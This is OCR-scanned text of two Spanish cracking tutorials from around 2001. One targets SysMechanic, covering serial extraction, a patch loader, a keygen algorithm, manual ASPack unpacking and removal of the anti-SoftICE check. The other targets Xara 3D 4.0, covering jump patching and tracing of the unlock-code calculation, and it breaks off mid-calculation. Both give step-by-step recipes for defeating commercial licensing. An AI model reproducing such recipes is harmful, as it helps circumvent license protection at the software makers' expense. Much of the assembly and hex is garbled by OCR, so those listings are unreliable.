D15F:004900€C”7? 7505 0O04900CE 


D15F :004900C9 ES 


Como vemos, si la flag cero está activada al salir de la llamada, no probocaremos el salto y esi=1, entonces utilizando nuestra 
intuición (no hace falta esforzarse mucho) nos damos cuenta que esto quiere decir registrado Estandar, si miramos más abajo, 
vemos que el esquema se repite dos veces más, salvo que pone esi=2 y esi=3. Como podemos ver ha sido demasiado fácil 
extraer los códigos. Asi que he decidido hacer algo más divertido :-) 


Jugando con el Código 


OK, manos a la obra. Lo que vamos a hacer, es parchear el programa de forma que él mismo nos de el código. ¿Cómo?, sólo 
hay que cambiar el mensaje de error por el número de serie correcto. Para hacer esto, lo primero que debemos saber es dónde 
aparece la ventana. Trazando con F10 donde lo dejamos antes, podremos ver rápidamente en que dirección nos aparece, 
concretamente al pasar por 490184 aparece la ventana de error. Ponemos un bpx en esa dirección y volvemos a introducir los 
datos, salta sice, y nos metemos dentro del call con F8, y vemos algo interesante: 


015F:0045F7?E4 BSFor”74500 EAX, 0045F7FS 
015F:0046F7E9 ESSE28FBFF 00442040 


D15F :0045F7?EE 


Movemos a eax la dirección 48F7F8, y si pasamos por encima de la llamada, veremos que aparece la ventana. Pero primero 
veamos que hay en esa direccion de memoria: 


0167:0045F?FS 59 6 75 20 658 6 76 65-20 65 6 , 65 72 65 6 You 


0167:0045F508 20 6 SE 20 69 6 16 6 60 69 64 ¿0D 33 73 63 Te an invalid User” 


¡ Justo lo que buscábamos ! esta es la frase que queremos cambiar. Ahora sólamente necesitamos saber donde está nuestro 
¡ 
serial correcto; pero, no aparece por ninguno de los registros, vamos a tener que trabajar un poco más de la cuenta. 


Bien, lo que vamos a hacer es que nos muestre el serial para la versión industrial. Para ello, nuevamente metemos los datos, y 
trazamos con F10 hasta llegar a la llamada donde saca el serial industrial., que está en 490117: 


015F:0049011€ [EBP-08] 
015F:0049011F EDX, [EBP-04] 
015F:00490122 a7D3 ? C 00403F214 


O15F :00490127 505 0049012E 


O15F : 00490129 


Nota: Los bytes de las instrucciones asm que metamos, apuntadlos en un papelito. 


Ok, al pasar tras el mov eax, [ebp-08], si ponemos d eax, veremos que aparece en la ventana de datos el serial industrial para 
nuestro nombre. Lo que vamos a hacer es meter esa información en otro registro, concretamente en esi. ¿Por qué esi? pues 
porque es el que he probado y he visto que llega practicamente intacto hasta el mensaje de error, el programa no lo utiliza para 
meter nada en él. Por tanto nos situamos en Sice, tal como está en la imagen, sobre 49011F, y nos disponemos a introducir una 
instrucción en asm, metemos 'a eip', y metemos la instrucción 'mov esi, eax' pulsamos enter, y como vemos que sólo ocupa dos 
bytes, metemos un 'nop' (ya que la instrucción original tenía tres bytes 8B535FC) y pulsadmos enter dos veces más. No sé si lo 
habré explicado muy bien, cualquier duda que tengáis preguntádmela. 


La primera parte ya está hecha, ahora vamos donde lo habíamos dejado antes, en 48F7E4, y miramos el registro esi (d esi), y 
vemos que ahí está nuestro serial industrial, aunque un poco movido a la derecha, concretamente 5 espacios para comprobarlo 
escribimos d esi+5, y veremos que se coloca perfectamente. Ahora sólo tenemos que pasar lo que está en esi a eax, para ello, 
nuevamente tenemos que escribir un poco de asm, 'a eip', y metemos 'lea eax, [esi+5]', que ocupa tres bytes, como la original 
ocupaba cinco, B8F8F74800, tenemos que meter un par de nops para rellenar. ('nop' enter, 'nop' dos veces enter). Pulsamos FS 
y... aparece el serial en la ventana!!!! Ahora estaréis pensando en hacer estos cambios permanentes en el archivo original, pero 
no, porque está empakado con aspack, y aunque con Unaspack, lo tendríamos rapidamente, mejor vamos a hacer un loader, y 
nos evitamos rollos. Voy a utilizar Princess Sandy, aunque cualquier otro servirá. 


Por fin, estamos terminando esta parte, para hacer un loader, lo que necesitamos saber es la dirección de memoria donde lo 
queremos aplicar, los bytes originales de la instrucción a reemplazar y los bytes de la nueva instrucción que queremos 
introducir en su lugar, resumiendo, abrimos "Princess Sandy" y cargamos 'SysMechanic.exe', ahora por cada instrucción que 
queramos introducir pulsamos 'add item', y rellenamos los campos: (las direcciones con todos los ceros correspondientes) 
Adress: 0049011F; Original Data: 8B55FC; Patch Data: 8BFO09O . 

Adress: 0048F7E4; Original Data: B8F8F74800; Patch Data: XXXXXXXXXX . Este os lo dejo a vosotros ;) 


Pulsamos 'Build' y ya está nuestro Loader !!! Sólo queda probarlo. Esto podríamos llamarlo 'Keygen cutre para el registro 
industrial' ;-) 


El generador de Claves 


Lo más dificil a la hora de hacer un Keygen suele ser localizar el lugar o lugares donde es creado nuestro serial correcto, ¡¡ y 
nosotros ya lo hemos hecho!!! ;-) 


Las explicaciones que voy a poner corresponden a el número de registro para la versión Estandar, aunque los tres se crean 
exactamente igual, de hecho todos se crean en la misma dirección, 4FE97C, unicamente cambia lo que podríamos llamar "la 
semilla", que para cada uno de ellos es diferente. Por tanto, nos dirigimos a la call que nos mostró el serial estandar correcto: 
4900B7. (ponemos un bpx aqui) 


Ok, ponemos el breakpoint (bpx 4900B7) metemos los datos de registro (ponemos un nombre de 12 dígitos, para ir todos 
iguales), pulsamos ok, y salta Sice en la llamada, nos metemos dentro de ella con F8, aparecemos en 4FE97C, trazamos un 
poco con F10 y vemos las primeras comparaciones: 


D15F:004FE9AF S837DFS01 DWORD PTR [EBP-08],01 
OD4FE9EB3 "505 DO4FE9BA 
DO4FE9B5S OODODO OOOODDO 
OO4FE9BA 53 DWORD PTR [EBP-085] ,02 
DO4FE9BE OD4FE9C5 
DO4FE9CO OODODO OOOODO 
DO4FE9CS 837DF803 DWORD PTR [EBP-085] ,03 
OD4FE9C9 "505 DO4FE9DO 
OO4FES9CE  BFOCOOODOO  -=. MOY  ——»''EDI,ODO0DODOC 
OO4FESDO 537?DFS0O5 DWORD PTR [(EBP-05],05 
0D04FE9D4 ¿505 OO4FES9DE 


OO4FE9D6 EF129D00000 -»-»=»._ MOY —'”''>EDI,000000 


OO4FE9SDE  EEZ1000000 — MN ———— EBX,000000 4 


Como podemos ver, lo único que se saca de estas comparaciones es el valor de EDI, que puede ser 11h, 17h, OCh ó 19h (todos 
en hexadecimal por supuesto, para no liarnos, pondré una h detrás de cada número en hexadecimal), ya que EBX será 21h en 
todo caso. Pues bien, aqui es donde selecciona esa 'semilla' que os dije, dependiendo del tipo de registro que vayamos a hacer. 
En este caso como hemos entrado en el momento que crea el de la edición estandar, vemos que EDI toma el valor es 11h. Esta 
es la única diferencia en la creación de los distintos tipos de registro, lo cuál nos quitará mucho trabajo a la hora de hacer el 
keygen. Bien, ya tenemos los primeros datos para el keygen, continuemos con F10. Hasta que poco después vemos que antes 
de una llamada, nuestro nombre se ha movido a eax, en 4FE9F8: 


D15F:004FE9FS 5B45FC EAX, [EBP-04] 
O15F:004FESFB ES9454FOFF CA 00403E94 
015F:004FEAOO S53FS0A EAX, OA 
D15F:004FEA03 DOO4FE9E2 


Pasamos por encima de la llamada, y vemos que el registro eax ha tomado el valor OCh que en decimal es 12, es decir calcula 
la longitud de nuestro nombre y la compara con Ah, que es 10 en decimal, y si es inferior saltamos más atrás, creando un bucle 
hasta que el nombre tome longitud 10. Como nosotros hemos metido un nombre de 12 caracteres, seguimos hacia delante, 
justo en la siguiente llamada, nuestro nombre es pasado a mayúsculas, continuamos hasta que llegamos a 4FEA29 que es 
donde comienza la creación del serial: 


:004FEA29 BBO1000000 mov ebx, 00000001 <- EBX=1. EDI=11. ECX=1. ESI= longitud del 
nombre 


:004FEA2E 8B45FC mov eax, dword ptr [ebp-04] <- EAX tiene nuestro nombre (d eax) 
:004FEA31 8A4418FF mov al, byte ptr [eaxtebx-01] <- al un Caracter del nombre 
(por orden) 

:004FEA35 3C46 cmp al, 46 <- Lo compara con 46h = 70 decimal= 'F' 

:004FEA37 7622 jbe 004FEA5B <- si el caracter es mayor o igual que 'F' salta 


:004FEA39 8B45FC mov eax, dword ptr [ebp-04] 


:004FEA3C 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <- eax = caracter del nombre 
seleccionado 

:004FEA41 8D143B lea edx, dword ptr [ebx+edil] <- edx ebx + edi 

:004FEA44 2BC2 sub eax, edx <- eax eax edx 

:004FEA46 8D55DE8 lea edx, dword ptr [ebp-18] 

:004FEA49 E85A9AFOFF call 004084A8 <- ecx = eax. Calculamos el valor decimal del 
caracter 

:004FEA4ZE 8B55DE8 mov edx, dword ptr [ebp-18] <- edx valor decimal del 
Caracter seleccionado 

:004FEA51 8D45F0 lea eax, dword ptr [ebp-10] 

:004FEA54 E84354F0FF call 00403E9C <- Colocamos edx en su sitio, para formar 

el numero de registro 

:O004FEA59 EB20 jmp 004FEA7B <- Saltamos para preparar la siguiente vuelta 
:004FEAS5B 8B45FC mov eax, dword ptr [ebp-04] 

:004FEA5E 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <- eax = caracter del nombre 
seleccionado 

:004FEA63 8D143B lea edx, dword ptr [ebx+edil] <- edx = ebx + edi 

:004FEAG6 03C2 add eax, edx <- eax = eax + edx 

:004FEA68 8D55E8 lea edx, dword ptr [ebp-18] 

:O004FEAGB E8389AF0FF call 004084A8 <- ecx = eax. Calculamos el valor decimal del 
caracter 

:004FEA7O 8B55E8 mov edx, dword ptr [ebp-18] <- edx valor decimal del 
Caracter seleccionado 

:004FEA73 8D45F0 lea eax, dword ptr [ebp-10] 

:O004FEA76 E82154F0FF call 00403E9C <- Colocamos edx en su sitio, para formar 

el numero de registro 

:O004FEA7B 47 inc edi <- edi edi+1 

:O004FEA7C 43 inc ebx <- ebx ebx+1 

:004FEA7D 4E dec esi <- esi esi-1 

:O04FEATE 75AE jne 004FEA2E <- Volvemos a repetir el proceso hasta que esi=0. 


Si hemos introducido un nombre de menos de 10 caracteres, como os dije antes, el programa nos añade al nombre sus propios 
caracteres hasta que tenga 10, estos caracteres son siempre iguales comienza a añadirlos a partir del caracter 21h, 33 decimal, 
que es '! y va añadiendo los caracteres que siguen a este hasta completar el nombre. Por ejemplo si introducimos la letra 'a' 
como nuestro nombre, el nombre resultante será: ' a!"$%k8() '. Este es el número máximo de caracteres que añade, ya que si 
no ponemos nombre, no vale. Un ejemplo más, si metemos de nombre 'pedro' quedará 'pedro!"++$%'. Espero haberlo dejado 
claro. 


Bueno, con todo esto sólo hemos obtenido un número, pero el serial no es de esta forma, el serial es de la forma 12345-ST123- 
1234567890. Pero es muy fácil saber a simple vista como lo coloca. Lo veremos con un ejemplo: supongamos que el número 
obtenido es 838689929598414039383736 el serial sería 83868-ST841-6373839304. La primera parte del serial corresponde a 
los cinco primeros dígitos del número. La última parte del serial corresponde a los diez últimos dígitos del número, pero 
tomados desde el final. Por último, los números de la parte central del serial corresponden a los tres dígitos que están en el 
centro del serial, no hay más que calcular la mitad del número (divisiones sin decimales por supuesto) y coger los tres digitos 
que ahí estén. En este ejemplo, el número tiene 24 dígitos, si hacemos 24 div 2=12, vamos al dígito 12 y lo seleccionamos 
junto a los dos siguientes dígitos, que precisamente son 841. 


En resumen, lo que tenemos que tener en cuenta a la hora de programar nuestro keygen es: 
1.- Lo primero la longitud de nuestro nombre, y si faltan caracteres añadir los que falten. 
2.- Pasamos nuestro nombre a mayúsculas. 


3.- Los registros comienzan con los siguientes valores: EBX=1; ECX= 1; ESI= longitud del nombre ( en hexa); EDI= 11h (a 
'semilla”); 


4.- Seleccionamos un caracter del nombre (por orden por supuesto) y lo comparamos con 'F' si es mayor igual saltaremos si no 
continuaremos sin saltar. La única diferencia radica en que si es mayor que 'F', a eax se le suma edx y si es menor se le resta. 


5.- Pasamos a eax el valor del caracter seleccionado de nuestro nombre, edx=ebx+edi. A eax se le suma o se le resta edx según 
corresponda. 


6.-El valor de eax resutante, será un número, en hexadecimal, lo tenemos que convertir a decimal, y meterlo en una especie de 
cadena, para formar el número final correspndiente a nuestro número. 


7.- Una vez obtenido el número, lo reordenamos hasta formar el serial. 


Bueno, como veis ha sido muy fácil, sólo nos queda programarlo aqui tenéis el que yo he hecho en pascal en el archivo 
sysmecky.pas. Recordad que no debemos poner nombres al programa como keygen o cosas así, o si no reiniciará la 


computadora. :-) 


Cualquier duda que tengáis sobre el programa o cualquier cosa que no haya dejado clara, sólo tenéis que preguntarlo. 


Volcado del Programa 


Lo primero, analizamos el programa con File InsPEctor, o un programa similar, y nos dice que el programa está empaquetado 
con Aspack. Podemos hacer varias cosas, la más rápida y sencila es utilizar Unaspack, y veremos que nos da un bonito y 
perfecto ejecutable :-) Pero como a nosotros nos gusta trabajar más que a nadie :-P, vamos a volcar el programa a mano. 


Lo primero a la hora de volcar un programa es encontrar el Original Entry Point (OEP), el punto original de entrada, para esto 
vamos a utilizar un sencillo y eficaz método de Raziel que podemos encontrar en el Dark Project. Es muy sencillo, vamos a 
Softice, y metemos un breakpoint a GetProcAddress, bpx getprocaddress, salimos de sice, y arrancamos el programa, saltará 
sice, habrá que ir pulsando FS y F12 hasta que veamos que aparece en la linea verde SysMechanic!.aspack, las veces que habrá 
que pulsar FS varía según el sistema, por eso no concreto más. Ahora nos desplazamos para abajo (con las flechas de 
desplazamieto), sobre la ventana de código para buscar una instrucción, en concreto un Push 00000000 ... miramos, ....y un 
poco más abajo lo vemos y ponemos un breakpoint en esa dirección: 


D15F:005F44FB 220000 , oODoOCc 


D15F :005F4503 


Una vez puesto el breakpoint, pulsamos FS... salta sice en esa dirección, pero ahora en lugar de aparecer Push 00000000 pone 
Push 0050F104 y justo después aparece un RET. EL 50F104 es nuestro OEP, y al pasar el Ret, vamos justo a él, por tanto el 
programa ya está descomprimido, sólo nos queda volcarlo a nuestro disco duro. Para ello, nos situamos sobre el Ret, y 
escribimos en sice: 'a eip', e introducimos la instrucción: '¡mp eip' pulsamos un par de veces enter, y FS, para crear un bucle, 
dejando el programa desempaquetado en la memoria, listo para que lo volquemos al disco duro. Para ello, abrimos Procdump, 
y en la lista de tareas, seleccionamos Sysmechanic.exe con el botón secundario del ratón, y pulsamos 'Dump (full) en el menú 
emergente, nos pide un nombre para el archivo, le metemos por ejemplo sys_dump.exe, y lo guardamos en la carpeta del 
programa original. Para cerrar la aplicación que dejamos con el bucle infinito, seleccionamos 'Kill Task", en el mismo menú de 
antes. 


Sin cerrar Procdump, ahora vamos a PE Editor, y abrimos el ejecutable que acabamos de crear, y cambiamos el valor el OEP 
por que hemos encontrado, pero habiéndole restado antes la Image Base, es decir 50F104-400000=10F104=0EP. Ya está 
listo, pero si tenemos pensado abrirlo con Wdasm, nos metemos en 'Sections', y en la primera sección que aparece pulsamos 
con el botón secundario del ratón, seleccionamos 'Edit Section' y cambiamos sus características de CODOO040 a E0000020. 
Ahora sí hemos terminado del todo, probamos el ejecutable, y ¡¡ Funciona !! 


Protección Anti-Sice 


Bueno, para terminar este largo (casi interminable) tutorial, vamos a eliminar la protección anti-sice, simplemente 
frabricaremos un loader, o si queréis podéis hacer un parche para el ejecutable desempaquetado. 


En este programa concreto, hay dos formas de eliminar la protección anti-sice, la directa o la indirecta. ¿Cuál es la indirecta? 
Pués bien, ¿qué hace el programa si encuantra sice? se reinicia nuestra computadora, ¿qué hace el programa si encuentra un 
proceso activo, con el nombre de R!sc's, keygen, etc.? también reinicia, mmm.... jejeje, creo que ya sabéis por donde voy, sólo 
hay que encontrar la llamada que proboca el reinicio y tendríamos localizada la zona en la que el programa busca a softice. 
Pero, como veremos a continuación la forma directa es aún más rápida, aunque por lo que pueda pasar, nunca está de más tener 
más de una ruta de escape ;-) 


Veamos la forma directa. Lo primero es saber qué es lo que estamos buscando, las protecciones más usuales suelen ser 
'Meltlce' y la segunda suele ser una 'int 3' que no funciona con softice, y provoca un error. Lo que parece que hace el programa 
es utilizar Meltlce, ya que no da error por ninguna parte. 


Bien, esta protección es muy fácil de localizar. Vamos a sice (Ctrl+D) y metemos un bpx CreateFileA. Arrancamos el 
programa y rompe sice, FS un par de veces más y F12 para llegar al código de nuestro programa, justo debajo de la llamada a 
la API: 


015F:00500FO1  681C0F5000 

015F :DOSOOFO6 

D15F : DOSOOFOB 

015F : DOSOOFOE 

015F:D0500F10 

D15F:00500F11 EERNEL32 'CloseHandle 


015F:00500F16 330 BL,O1 


45-50 00 00 00 


hemos dado justo en el blanco, vemos que si encuantra algo bl se pone a 1 (mov bl, 01), si no continua a cero, con cambiar el 1 
por el O (mov bl, 00), ya estaría pasada la protección, así de fácil. Ya sabéis que es lo que hay que hacer para hacer el loader, y 
también para hacer el parche eso ya os lo dejo a vosotros. 


Nota: para los que uséis windows NT, veréis que en esta llamada, no detecta a sice, pero en la siguiente llamada tened cuidado 


3) 


Otra forma de encontrar la protección, una vez que tenemos el programa desempaquetado, sólo tenemos que ir a Wdasm, 
desemsamblarlo, y buscar en las Strings References "WASICE" y "NANTICE" y ya está, aunque no siempre podremos hacer 
esto. 


Finalizando 


Bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna pregunta 
no dudéis en decírmelo. Espero que os haya resultado útil este tute. No olvidéis que nuestro objetivo sólo es aprender. Sin 


contar con la diversión que esto supone por supuesto ;-)) 
Un Gran Saludo para: 


PrOfesor X 

SiILVeR STORM 

Txeli 

DeK_OiN 

Act Mago 

RAZIEL, ViPER y LEIRUS 


Al resto de amigos de K-FoR (Hi John) 


e Todo el DREAM TEAM de la Compilación de Tutoriales 2001 CdT2001 :) 


e Saludos a todos los crackers del mundo 
Hasta la próxima... 


«poroto a » 


Mi correo: kuato thortdhotmail.com 


La página de [K-FoR]: http://pagina. de/kfor 
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Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD : 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
Xara 3D 4.0 


Código de desbloqueo generado a partir del 
registro 


Hacer un Keygen. 


Programa que produce textos en 3D con efectos de 
luz, color y movimiento. 


Aficionado 


http://www.xara.com/downloads/software/xara3d4n.exe 


Softice, MAsm32 


Caos Reptante FECHA: 03/07/2001 


INTRODUCCION 


Este programa, que a mí me parece que no está nada mal, tiene desde nuestro punto de vista como 
principal característica, la de generar un código a partir de datos del registro. Al darles este código 
junto con nuestro dinero :o( nos dan un código de desbloqueo para evitar que en el fondo de 
nuestros diseños aparezca un mosaico de anagramas del programa, que los estropea 
completamente. Aunque esto me parezca vomitivo, debo reconocer que es una manera eficaz de 
mostrar las posibilidades del programa sin que se pueda obtener nada útil de él. Es realmente 


maquiavélico :o( 


Vamos a frustrar las intenciones del programador, confeccionando un keygen que nos permitirá 
evaluar con calma el programa ;0) 


AL ATAKE 


Me gusta hacer keygens, pero me he encontrado con algún programa que, por ejemplo, de la versión 3.0 a la 3.1, 
cambia el número de registro. Así no merece la pena emplear tiempo en hacer un keygen, cuando la utilidad de este 
puede ser en ocasiones, tan limitada como la de un parche :o( Para animaros a vosotros, y animarme yo, transcribo a 
continuación la opinión de ESTADO+PORCINO: 


¿Merece la pena hacer un Generador? 


La respuesta es depende. Hacer un Generador no es nada sencillo, consume mucho tiempo y habilidades. Es mucho más 
fácil parchear la rutina de verificación para que acepte cualquier cosa. 

Pero las ventajas de crear un Generador son muy importantes, primera y ante todo es que realmente se está cumpliendo 
con la filosofía crack (ingeniería inversa) al comprender y transformar el programa para que se adapte a nuestras 
necesidades. 

Segunda ventaja son los conocimientos que se captan sobre todo a nivel ensamblador y de operaciones aritméticas con 
bits. 

Tercera y no más importante la satisfacción del trabajo artesano, bien hecho. Esa satisfacción que nos hace seguir 
adelante. 

La cuarta ventaja tiene que ver con la historia del Software. Puedes "coleccionar" las protecciones de tu programa 
favorito y ver la evolución de su software. 

Y como quinta, un fin práctico, al final del proceso se obtiene un número de serie válido, lo que te convierte en un 
usuario "legal" y problamente no tengas que crakear la próxima versión. 


No sé si en el futuro seguiré haciendo keygens, o parchearé programas, o me dedicaré a la cria de chinchillas. Bien, 
vamos a lo nuestro. En primer lugar, voy a indicar los saltos que se deberían modificar para parchear el programa. Esto 
no aporta nada nuevo, pero me permitirá hacer alguna consideración que creo de interés. A continuación veremos la 
manera en que se generan los códigos, y finalmente elaboraremos el keygen. En mi último tuto, (el del News Rover) 
acabé bastante harto, y dejé un poco en el aire la explicación de la programación del keygen. Aquí procuraré dejarlo lo 
más claro posible. 


PARCHEADO DEL PROGRAMA 


Lo más práctico es empezar por ver, mediante el File Inspector, Languaje 2000 o similar, si el programa tiene alguna 
característica especial. Aparentemente no es este el caso y pasamos al desensamblado con el W32Dsam. Aquí nos 
encontramos con que el desensamblado se detiene al empezar el código. Probé de cambiar el valor de las secciones con 
el ProcDump sin obtener ningún resultado. Finalmente, recordando una conversación anterior, le expliqué el problema a 
DeK_OIiN, quien me recomendó mirar atentamente la cabecera del programa. Así lo hice con el ProcDump (PE 
Editor/Sections) y vi lo siguiente: 


Sections Editor 


Sections Informations : 


Name [VitualSize | VittualOlfset | RawSize | RawOffset_ | Characteristics | 
text 00081642 00001000 00082000 DOWO1ODO  s000DOZO 
WCODE — 0000ED39  0DOB3000 00007000 00OB3000  E0OOOO20 
sdata 000284400 DOOBADOO 00028000 ODOBADOOD 40000040 
data 00048368 DOOESO0O 00003000 00OES000  CO000040 
sto 0002ED20 0012000 0002F000  DOOEEOOO 40000040 


¿Veis algo extraño? Pues lo hay. En la sección .data el Virtual Size es de 48368, y el Raw Size de 9000. Parece que se 
les ha caído un cuatro :0) Consecuentemente, el Virtual Offset de la sección siguiente es 12E000, mientras que el Raw 


Offset es EEO00. Una vez arreglado esto, (botón derecho sobre .data/ Edit section/Raw Size=00049000, y sobre .rscr 
Edit Section/Raw Offset=0012E000) el W32Dsam desensambla el programa sin ningún problema. Muchas gracias 
DeK :0) Por cierto, me he cargado el programa. Ahora da error al ejecutarse, pero he conseguido desensamblarlo que es 
lo que quería. 

Aquí están las comparaciones a "optimizar" (luego veremos como llegamos hasta aquí): 


:0041F6C1 8378F807 cmp dword ptr [eax-08], 00000007 
:0041F6C5 0F85FF010000 jne 0041F8CA 
:0041F6CF E814CD0500 call 0047C3E8 
:0041F6D4 83C404 add esp, 00000004 
:0041F6D7 85C0 test eax, eax 
:0041F6D9 0F84EB010000 je 0041F8CA 
:0041F6EB E8F8CC0500 call 0047C3E8 
:0041F6F0O 83C404 add esp, 00000004 
:0041F6F3 85C0 test eax, eax 
:0041F6F5 0F84CF010000 je 0041F8CA 
:0041F707 E8DCCCO5SOO call 0047C3E8 
:0041F70C 83C404 add esp, 00000004 
:0041F70F 85C0 test eax, eax 
:0041F711 0F84B3010000 je 0041F8CA 
:0041F723 E8C0CCO500 call 0047C3E8 
:0041F728 83C404 add esp, 00000004 
:0041F72B 85C0 test eax, eax 
:0041F72D 0F8497010000 je 0041F8CA 
:0041F73F E8A4CC0500 call 0047C3E8 
:0041F 744 83C404 add esp, 00000004 
:0041F 747 85C0 test eax, eax 
:0041F749 0F847B010000 je 0041F8CA 
:0041F75B E888CC0500 call 0047C3E8 
:0041F760 83C404 add esp, 00000004 
:0041F763 85C0 test eax, eax 
:0041F765 0F845F010000 je 0041F8CA 
:0041F777 E8S6CCCO50O call 0047C3E8 
:0041F77C 83C404 add esp, 00000004 
:0041F77F 85C0 test eax, eax 
:0041F781 0F8443010000 je 0041F8CA 
:0041F80F 3BC1 cmp eax, ecx 
:0041F811 0F85B3000000 jne 0041F8CA 


En la primera, se comprueba que la longitud del código es de siete caracteres. En las siete siguientes, que se trata de 
letras. Y en la última, que el código es correcto. 

A mi no me gusta (no digo que esté mal, digo que no me gusta) invertir los saltos, prefiero obligar a saltar o impedir el 
salto, según convenga. En este caso, ninguno de los saltos debe producirse, por lo que deberíamos "nopear" el primer y 
el último salto, substituyendo por ejemplo OF 85 B3 00 00 00 por 90 90 90 90 90 90, o por OF 85 00 00 00 00 que envía 
el salto a la línea siguiente. Con los otros siete, se puede hacer lo mismo, o ir a buscar el call, y hacer que al regreso de 
éste, EAX sea igual a uno. Pero lo que en este caso no debe hacerse, es invertir los ocho primeros saltos, porque de 
hacerlo así, en el caso de que se nos ocurriera introducir un código de siete caracteres, o de que alguno de estos 
caracteres fuera una letra, el programa no nos aceptaría el código. 


OBTENCION DEL CODIGO 


Bien, después de divagar, vamos a hacer cosas útiles. En primer lugar, con el Soflce cargado, ejecutamos el 

rograma, y vemos que lo primero que hace es darnos la opción de adquirirlo o de continuar. Le damos a "Purchase" 
, nos aparece una ventana en cuya parte superior aparece un código de nueve letras que no nos interesa y en la parte 
inferior una ventana de texto para introducir el código y el botón de unlock. Vamos a introducir un código, pero 
¿cual? Si previamente hubiéramos mirado en la ayuda del programa el procedimiento para registrarse, (siempre es 
conveniente hacerlo) hubiéramos leído esto: 


Unlocking uses two keys: 
a nine letter Key code (el que aparece en la parte superior) 
a seven letter Unlock code (el que debemos introducir) 


Pues muchas gracias :0D Así que vamos a introducir un código de siete letras "ABCDEFG" que si bien nos costará 
localizar en la memoria, nos permitirá ver el orden en que deben ir las letras con mayor facilidad. Antes de pulsar 
"Unlock software", pulsaremos control+D y una vez en el Softlce, introduciremos bpx hmemcpy. Salta el Slce y 
pulsamos unas siete veces F12 para volver al Xara. 


:004961A0 FF90A0000000 call dword ptr [eax+00000040] llamada 
a HMEMCPY 

:004961A6 8945FC mov dword ptr [ebp-04], eax llegamos 
aquí 


¡Ahora se trata de localizar la cadena "ABCDEFG" en la memoria. Lo haremos mediante la instrucción s 30:00 1 
£fffffff 'ABCDEFG', la cual nos lleva a una cadena de texto que incluye todo el abecedario y que no tiene 
ada que ver con lo que nos interesa. Pulsamos s para seguir buscando y por fin, después de varios intentos, 
legaremos a la buena.(La dirección puede ser parecida a 0ODC47xx). Una vez localizado nuestro código, 
introduciremos la instrucción bpm dirección rw que nos parará el Slce cuando se lea esta posición de 
coo que corresponde a la primera letra de nuestro código. FS para continuar y el Slce se detiene en KERNEL32. 
ulsamos F12 dos veces y de vuelta en el Xara: 


:00499931 FF1528A34B00 Call [KERNEL32!1strlen] 
:00499937 8BOE mov ecx, dword ptr [esi] llegamos 
aquí 


Parece que ha mirado la longitud del código y la ha colocado en EAX. De momento, nada de interés. FS para 
continuar y llegamos a la zona caliente :0) 


:0041F6CB OFBE1O movsx edx, byte ptr [eax] 
:0041F6CE 52 push edx 
:0041F6CF E814CD0500 call 0047C3E8 


En este call, se suma el doble del código ASCII de la primera letra a la dirección de inicio de una tabla. En la 
dirección indicada por esta suma, se hallará un número impar si el código corresponde a una letra mayúscula. A 
continuación, se hace un AND 01 con este número quedando el resultado en EAX. Lógicamente, este resultado será 1 
si el número es impar y O en caso contrario. De vuelta: 


:0041F6D4 83C404 add esp, 00000004 
:0041F6D7 85C0 test eax, eax 
:0041F6D9 0F84EB010000 je 0041F8CA 


:0041F6DF 8B842444010000 mov eax, dword ptr [esp+00000144] 


:0041F6E6 OFBE4801 movsx ecx, byte ptr [eax+01] 
:0041F6EA 51 push ecx 
:0041F6EB E8F8CC0500 call 0047C3E8 


Sigue con las otras seis letras y a continuación empieza el cálculo: 


:0041F787 8BC5 mov eax, ebp 
:0041F789 8BCD mov ecx, ebp 


E EBP se encuentra un número (B466C9E8) que merece toda nuestra atención. Luego veremos de donde ha salido. 
or cierto, cuando registremos el programa :0) este número quedará anotado en el registro. 


:0041F78B D1E8 shr eax, 1 

:0041F78D 2555555555 and eax, 55555555 

:0041F792 81E155555555 and ecx, 55555555 

:0041F798 8D0C48 lea ecx, dword ptr [eax+2*ecx] 
:0041F79B 8B842444010000 mov eax, dword ptr [esp+00000144] 
:0041F7A2 69C915DE7856 imul ecx, 5678DE15 


Va haciendo cálculos con el número misterioso, y el resultado que en mi caso es AA692764, lo guarda en ECX para 
compararlo más adelante y pone en EAX la dirección de nuestro código. 


:0041F7A8 8A5801 mov bl, byte ptr [eax+01] BL=42 
(22 letra) 

:0041F7AB 8A5003 mov dl, byte ptr [eax+03] DL=44 
(4% letra) 

:0041F7AE 885C2432 mov byte ptr [esp+32], bl 

:0041F7B2 8A18 mov bl, byte ptr [eax] BL=41 
(1% letra) 

:0041F7B4 885C2430 mov byte ptr [esp+30], bl 

:0041F7B8 8A5805 mov bl, byte ptr [eax+05] BL=46 
(6% letra) 

:0041F7BB 885C2431 mov byte ptr [esp+31], bl 

:0041F7BF 8A5802 mov bl, byte ptr [eax+02] BL=43 
(3% letra) 

:0041F7C2 885C2433 mov byte ptr [esp+33], bl 

:0041F7C6 8A5806 mov bl, byte ptr [eax+06] BL=47 
(78% letra) 

:0041F7C9 OFBE4004 movsx eax, byte ptr [eax+04] EAX=45 
(5% letra) 

:0041F7CD OFBEF3 movsx esi, bl ESI=47 
:0041F7DO 8D0440 lea eax, dword ptr [|eax+2*eax] 
:0041F7D3 OFBED2 movsx edx, dl EDX=44 
:0041F7D6 8DO04C6 lea eax, dword ptr [esi+8*eax] 


EAX+2*EAX es igual a 3*EAX, si ahora se multiplica EAX por 8, el resultado es igual a 24* el valor original de 
AX (45h), al que se le suma ESI, es decir: 47h. El resultado es 6BFh. (Identifico con la letra "h" los números 
exadecimales, excepto los de las anotaciones en el margen derecho). 


:0041F7D9 OFBE742433 movsx esi, byte ptr [esp+33] ESI=43 
:0041F7DE 8D0440 lea eax, dword ptr [|eax+2*eax] 
:0041F7E1l 8D04C6 lea eax, dword ptr [esi+8*eax] 


Se multiplica 6BFh por 24 y se le suma ESI (43h). El resultado es A22Bh. 


:0041F7E4 OFBE742431 movsx esi, byte ptr [esp+31] ESI=46 
:0041F7E9 8D0440 lea eax, dword ptr [|eax+2*eax] 
:0041F7EC 8D04C6 lea eax, dword ptr [esi+8*eax] 


Se multiplica A22Bh por 24 y se le suma ESI (46h). El resultado es F344Eh. 


:0041F7EF OFBE742430 movsx esi, byte ptr [esp+30] ESI=41 
:0041F7F4 8D0440 lea eax, dword ptr [eax+2*eax] 
:0041F7F7 8DO4C6 lea eax, dword ptr [esi+8*eax] 


